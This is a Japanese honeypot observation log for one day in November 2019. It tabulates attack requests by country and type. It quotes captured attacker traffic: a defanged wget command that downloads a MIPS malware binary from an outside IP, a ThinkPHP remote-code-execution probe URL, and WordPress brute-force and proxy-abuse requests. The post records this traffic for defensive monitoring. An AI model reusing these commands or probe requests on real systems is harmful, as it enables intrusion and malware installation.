WOWHoneypot観察(240日目)
2019/11/11(月)
トータルは203件でした。
ハンティングログは以下です。
65.32.180[.]57 wget+hxxp[:]//185.172.110[.]220/mipsel |
www.virustotal.com
www.virustotal.com
IPのロケーション別の件数は以下です。
アメリカ | 71 |
中国 | 27 |
オランダ | 24 |
トルコ | 13 |
フランス | 12 |
ドイツ | 10 |
ブラジル | 7 |
コロンビア | 4 |
シンガポール | 4 |
ベトナム | 4 |
日本 | 4 |
ロシア | 4 |
ウクライナ | 3 |
タイ | 3 |
エストニア | 3 |
イラン | 2 |
エクアドル | 2 |
イタリア | 1 |
ギリシャ | 1 |
ラトビア | 1 |
ケニア | 1 |
ハンガリー | 1 |
チェコ | 1 |
件数 | 概要 | リクエスト |
---|---|---|
59 | WordPressのログインページに対するブルートフォース攻撃 | GET /wp-login.php |
57 | WordPressのログインページに対するブルートフォース攻撃 | POST /wp-login.php |
45 | アクセス | GET / |
15 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /xmlrpc.php |
3 | クローリング | HEAD /robots.txt |
3 | 調査 | GET /script |
3 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
1 | 不正中継の調査 | HEAD hxxp[:]//123.125.114.144/ |
1 | 不正中継の調査 | GET hxxp[:]//www.123cha.com/ |
1 | Yealinkの調査? | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
1 | JBossの脆弱性を狙った通信 | GET /invoker/JMXInvokerServlet |
1 | 不正中継の試み | CONNECT www.ip.cn:443 |
1 | 不正中継の試み | CONNECT www.baidu.com:443 |
1 | 不正中継の試み | CONNECT cn.bing.com:443 |